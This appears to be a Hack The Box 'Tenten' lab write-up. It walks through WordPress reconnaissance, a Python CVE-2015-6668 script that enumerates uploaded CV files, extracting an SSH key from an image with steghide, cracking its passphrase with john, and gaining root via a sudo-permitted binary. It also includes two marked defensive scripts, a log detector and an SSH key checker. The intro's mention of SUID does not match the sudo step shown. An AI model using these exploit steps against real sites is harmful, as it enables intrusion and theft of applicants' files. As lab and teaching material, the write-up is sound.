HTB - Tenten

Getting Root:

  1. Discovered the box is running WordPress 4.7.3, which has a vulnerable plugin

  2. Exploiting the vulnerable plugin takes us to a protected link with an image

  3. Using steghide on the image gives us a private SSH key and we get a shell

  4. To get root, we abuse an executable with SUID

Nmap

nmap -sC -sV -p- -oA nmap/Tenten                                
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 21:56 EST                                  
WARNING: No targets were specified, so 0 hosts scanned.                                                                
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.51 seconds                                                         
root@kdeali:~/HackTheBox/Tenten# nmap -sC -sV -p- -oA nmap/Tenten 10.10.10.10                                                                                                                                                                 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 21:56 EST                                                        
Nmap scan report for 10.10.10.10      
Host is up (0.042s latency).                                                                     
Not shown: 65533 filtered ports                                                                  
PORT   STATE SERVICE VERSION                                                                     
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                                                   
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)       
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)       
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)     
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))                  
|_http-generator: WordPress 4.7.3                                                                
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                     
|_http-title: Job Portal – Just another WordPress site         
| vulners:                                                                                       
|   cpe:/a:apache:http_server:2.4.18:                                                            
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169 
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788 
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333                                                  
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798                         
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743                                                  
|       CVE-2016-8740   5.0     https://vulners.com/cve/CVE-2016-8740                                                  
|       CVE-2016-4979   5.0     https://vulners.com/cve/CVE-2016-4979                                                  
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197                                                  
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092                                                 
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763                                                 
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975                                                  
|       CVE-2016-1546   4.3     https://vulners.com/cve/CVE-2016-1546                                                  
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283                                                  
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612                                                  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                         
Nmap done: 1 IP address (1 host up) scanned in 115.10 seconds     

Services

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))                  

View Source

A quick visit to http://10.10.10.10 and a look at the page source reveals WordPress 4.7.3.

Gobuster

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.10
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/02/27 22:02:58 Starting gobuster
===============================================================
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-admin (Status: 301)
/server-status (Status: 403)
===============================================================
2020/02/27 22:06:03 Finished
===============================================================

Wpscan

wpscan --url http://10.10.10.10 --enumerate u

_______________________________________________________________                                                                                                                                                                               
         __          _______   _____                                                                                                                                                                                                          
         \ \        / /  __ \ / ____|                                                                                                                                                                                                         
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                                                                                                                        
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                                                                         
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                                                                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                                                                        
                                                                                                                                                                                                                                              
         WordPress Security Scanner by the WPScan Team                                                                                                                                                                                        
                         Version 3.7.8                                                                                                                                                                                                        
       Sponsored by Automattic - https://automattic.com/                                                                                                                                                                                      
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                                                                                                                                                                                        
_______________________________________________________________                                                                                                                                                                               
                                                                                                                                                                                                                                              
[+] URL: http://10.10.10.10/        
                                                                                                                                                                                                                                              
Interesting Finding(s):                                                                                                                                                                                                                       
                        

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.10/index.php/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - http://10.10.10.10/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>


[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] takis
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
    
    
[+] job-manager                                                                                                                                                                                                                               
 | Location: http://10.10.10.10/wp-content/plugins/job-manager/                                                                                                                                                                               
 | Latest Version: 0.7.25 (up to date)                                                                                                                                                                                                        
 | Last Updated: 2015-08-25T22:44:00.000Z                                                                                                                                                                                                     
 |                                                                                                                                                                                                                                            
 | Found By: Urls In Homepage (Passive Detection)                                                                                                                                                                                             
 |                                                                                                                                                                                                                                            
 | Version: 7.2.5 (80% confidence)                                                                                                                                                                                                            
 | Found By: Readme - Stable Tag (Aggressive Detection)                                                                                                                                                                                       
 |  - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt     
 

Research on job-manager plugin

A Google search for "WordPress job-manager 7.2.5" leads to https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

[CVE-2015-6668] CV filename disclosure on Job-Manager WP plugin
Title: CV filename disclosure on Job-Manager WP plugin
Date: 08/25/2015 
CVE-ID: 2015-6668 
Author: Evangelos Mourikis
Blog URL: https://vagmour.eu
Twitter: @teh_h3ck 
Versions: <= 0.7.25 
Plugin URLs: 
1. http://www.wp-jobmanager.com
2. https://wordpress.org/plugins/job-manager/

From the website we can easily browse the different job applications.

To make this easier, I created a simple bash script to search for all job applications:

for bull in {1..20}; do echo -n "Doing: $bull"; curl -s http://10.10.10.10/index.php/jobs/apply/$bull/ | grep '<title>Job Application'; done      
Doing: 1<title>Job Application: Hello world! &#8211; Job Portal</title>
Doing: 2<title>Job Application: Sample Page &#8211; Job Portal</title>
Doing: 3<title>Job Application: Auto Draft &#8211; Job Portal</title>
Doing: 4<title>Job Application &#8211; Job Portal</title>
Doing: 5<title>Job Application: Jobs Listing &#8211; Job Portal</title>
Doing: 6<title>Job Application: Job Application &#8211; Job Portal</title>
Doing: 7<title>Job Application: Register &#8211; Job Portal</title>
Doing: 8<title>Job Application: Pen Tester &#8211; Job Portal</title>
Doing: 9<title>Job Application:  &#8211; Job Portal</title>
Doing: 10<title>Job Application: Application &#8211; Job Portal</title>
Doing: 11<title>Job Application: cube &#8211; Job Portal</title>
Doing: 12<title>Job Application: Application &#8211; Job Portal</title>
Doing: 13<title>Job Application: HackerAccessGranted &#8211; Job Portal</title>
Doing: 14<title>Job Application &#8211; Job Portal</title>
Doing: 15<title>Job Application &#8211; Job Portal</title>
Doing: 16<title>Job Application &#8211; Job Portal</title>
Doing: 17<title>Job Application &#8211; Job Portal</title>
Doing: 18<title>Job Application &#8211; Job Portal</title>
Doing: 19<title>Job Application &#8211; Job Portal</title>
Doing: 20<title>Job Application &#8211; Job Portal</title>

The interesting one is number 13: Doing: 13<title>Job Application: HackerAccessGranted &#8211; Job Portal</title>

Let's use the python exploit from the page we found discussing the CVE in the job-manager plugin. I changed the year range, given that WordPress was showing 2017, and I also added a few additional extensions.

#!/usr/bin/env python3
# CVE-2015-6668 PoC by Evangelos Mourikis (https://vagmour.eu), adjusted for this box.
# job-manager stores uploaded CVs under wp-content/uploads/<year>/<month>/<name>.<ext>
# without access control, so a known applicant name can be located by guessing the path.
import requests

print("""
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
""")
website = input('Enter a vulnerable website: ')
filename = input('Enter a file name: ')

# spaces in the applicant name become dashes in the stored filename
filename2 = filename.replace(" ", "-")

# only 2017 is tried because the site's content is dated 2017
for year in range(2017, 2018):
    for i in range(1, 13):
        for extension in ('jpeg', 'jpg', 'png', 'php', 'doc', 'pdf', 'docx'):
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code == 200:
                print("[+] URL of CV found! " + URL)

Running the python exploit

chmod +x exploit.py 
./exploit.py 
  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg   
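Seen from the web server's side, the exploit above leaves a distinctive trail: dozens of requests under /wp-content/uploads/<year>/<month>/ that mostly return 404. The following Python script is an added example (not part of the writeup) that flags that pattern in Apache combined-format access logs; the sample log lines, client addresses and thresholds in it are constructed assumptions.

```python
#!/usr/bin/env python3
"""Flag clients probing /wp-content/uploads/<year>/<month>/<name>.<ext> for a guessed
filename: many 404s from one IP in a short window, spread over several month directories."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
UPLOAD_RE = re.compile(r'^/wp-content/uploads/(?P<year>\d{4})/(?P<month>\d{2})/[^/]+\.(?P<ext>[A-Za-z0-9]+)$')

def parse_line(line):
    """Return (ip, timestamp, path, status) for one combined-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))

def detect_upload_enumeration(lines, threshold=20, window=timedelta(seconds=60), min_months=3):
    """Map client IP -> summary for each client whose upload-path 404s cross the threshold."""
    per_ip = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, status = parsed
        u = UPLOAD_RE.match(path)
        if u:
            per_ip[ip].append((ts, status, u.group("year") + "/" + u.group("month"), u.group("ext").lower()))
    findings = {}
    for ip, events in per_ip.items():
        events.sort()
        j = 0
        for i, (start, _, _, _) in enumerate(events):
            # slide j to the first event later than start + window
            j = max(j, i)
            while j < len(events) and events[j][0] - start <= window:
                j += 1
            hits = events[i:j]
            misses = sum(1 for _, st, _, _ in hits if st == 404)
            months = {mo for _, _, mo, _ in hits}
            if misses >= threshold and len(months) >= min_months:
                findings[ip] = {"misses": misses, "months": len(months),
                                "extensions": sorted({ex for _, _, _, ex in hits}),
                                "first_seen": start.isoformat()}
                break
    return findings

def build_sample_log():
    """Constructed sample traffic, not real logs: 84 probes from 10.10.14.2 for the name
    found above (12 months x 7 extensions, one hit) plus ordinary browsing from 10.10.14.7."""
    base = datetime(2020, 2, 27, 23, 10, 0)
    exts = ("jpeg", "jpg", "png", "php", "doc", "pdf", "docx")
    lines = []
    for n, (month, ext) in enumerate((m, e) for m in range(1, 13) for e in exts):
        ts = (base + timedelta(seconds=n)).strftime("%d/%b/%Y:%H:%M:%S") + " -0500"
        status = 200 if (month, ext) == (4, "jpg") else 404
        lines.append(f'10.10.14.2 - - [{ts}] "GET /wp-content/uploads/2017/{month:02d}/HackerAccessGranted.{ext} HTTP/1.1" {status} 279 "-" "python-requests/2.22.0"')
    lines.append('10.10.14.7 - - [27/Feb/2020:23:10:05 -0500] "GET /wp-content/uploads/2017/04/HackerAccessGranted.jpg HTTP/1.1" 200 12345 "-" "Mozilla/5.0"')
    lines.append('10.10.14.7 - - [27/Feb/2020:23:10:06 -0500] "GET /index.php/jobs/apply/13/ HTTP/1.1" 200 5000 "-" "Mozilla/5.0"')
    return lines

if __name__ == "__main__":
    print(detect_upload_enumeration(build_sample_log()))
```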

Analyzing the image

strings HackerAccessGranted.jpg 
# Nothing interesting

binwalk HackerAccessGranted.jpg
# Nothing interesting
 
steghide --extract -sf HackerAccessGranted.jpg 
Enter passphrase: 
# It asked for a passphrase, so I just hit "Enter"
wrote extracted data to "id_rsa".

Cracking the ssh private key

file id_rsa 
id_rsa: PEM RSA private key
cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C
-----END RSA PRIVATE KEY-----

# Using ssh2john
ssh2john.py id_rsa > id_rsa_john_hash

# Using john with rockyou wordlist
john --wordlist=/root/HackTheBox/rockyou.txt id_rsa_john_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2020-02-27 23:51) 0.1751g/s 2511Kp/s 2511Kc/s 2511KC/sa6_123..*7¡Vamos!
Session completed
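The john output explains why the passphrase fell in five seconds: "KDF/cipher ... is 0" and "iteration count is 1" mean the legacy PEM format (Proc-Type/DEK-Info headers) stretches the passphrase with a single MD5 round, so wordlist speed is limited only by AES. The Python classifier below is an added example, not from the writeup: it reads the key file header and reports the protection in use for both legacy PEM and openssh-key-v1 files. The sample inputs are constructed and the 16-round "weak" cutoff is an assumption.

```python
#!/usr/bin/env python3
"""Classify how an SSH private key file is protected. A passphrase on a legacy PEM key
is stretched with one MD5 round (OpenSSL EVP_BytesToKey), so it is always rated weak;
the openssh-key-v1 format uses bcrypt with a configurable round count."""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\0"

def _ssh_string(b):
    """Encode one SSH wire-format string: uint32 length followed by the bytes."""
    return struct.pack(">I", len(b)) + b

def _read_string(buf, off):
    """Decode one SSH wire-format string at offset off; return (bytes, new offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def inspect_private_key(text):
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(OPENSSH_MAGIC))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        return {"format": "openssh", "encrypted": encrypted, "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds,
                "weak": not encrypted or kdf != b"bcrypt" or rounds < 16}
    if lines[0].startswith("-----BEGIN ") and lines[0].endswith(" PRIVATE KEY-----"):
        # legacy PEM: encryption is announced by RFC 1421 style headers before the base64 body
        headers = dict(l.split(":", 1) for l in lines[1:-1] if ":" in l)
        encrypted = headers.get("Proc-Type", "").strip() == "4,ENCRYPTED"
        cipher = headers.get("DEK-Info", "").strip().split(",")[0] if encrypted else "none"
        return {"format": "pem-legacy", "encrypted": encrypted, "cipher": cipher,
                "kdf": "EVP_BytesToKey-MD5" if encrypted else "none",
                "rounds": 1 if encrypted else 0, "weak": True}
    raise ValueError("unrecognised private key file")

# Constructed sample with the same headers as the extracted key; the base64 body is
# left out because only the headers are inspected.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

-----END RSA PRIVATE KEY-----"""

def build_openssh_sample(rounds=100):
    """Constructed openssh-key-v1 header (aes256-ctr, bcrypt, zero salt); the key
    material that would follow the KDF options is omitted on purpose."""
    kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = OPENSSH_MAGIC + _ssh_string(b"aes256-ctr") + _ssh_string(b"bcrypt") + _ssh_string(kdfopts)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"

if __name__ == "__main__":
    print(inspect_private_key(LEGACY_PEM), inspect_private_key(build_openssh_sample()))
```

Rewriting a legacy key with ssh-keygen -p -o -a 100 -f id_rsa moves it to the bcrypt-protected format that this classifier rates as not weak.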

Accessing the box

# Set the correct permissions on the private key id_rsa
chmod 600 id_rsa

# ssh to the box as root or takis, the two users we know about
# It fails with root
ssh -i id_rsa root@10.10.10.10
Enter passphrase for key 'id_rsa': 
root@10.10.10.10's password: 
Permission denied, please try again.
root@10.10.10.10's password: 
Permission denied, please try again.
root@10.10.10.10's password: 
root@10.10.10.10: Permission denied (publickey,password).


# Trying with username takis found on wpscan enumeration
ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.


Last login: Fri May  5 23:05:36 2017

Privilege Escalation

takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
takis@tenten:~$ sudo /bin/fuckin whoami
root


takis@tenten:~$ sudo /bin/fuckin /bin/bash
root@tenten:~# id
uid=0(root) gid=0(root) groups=0(root)


root@tenten:~# ifconfig
ens34     Link encap:Ethernet  HWaddr 00:50:56:b9:93:b6  
          inet addr:10.10.10.10  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:93b6/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:93b6/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:487142 errors:0 dropped:0 overruns:0 frame:0
          TX packets:477719 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:77437579 (77.4 MB)  TX bytes:237049609 (237.0 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:793 errors:0 dropped:0 overruns:0 frame:0
          TX packets:793 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:74479 (74.4 KB)  TX bytes:74479 (74.4 KB)

root@tenten:~# 
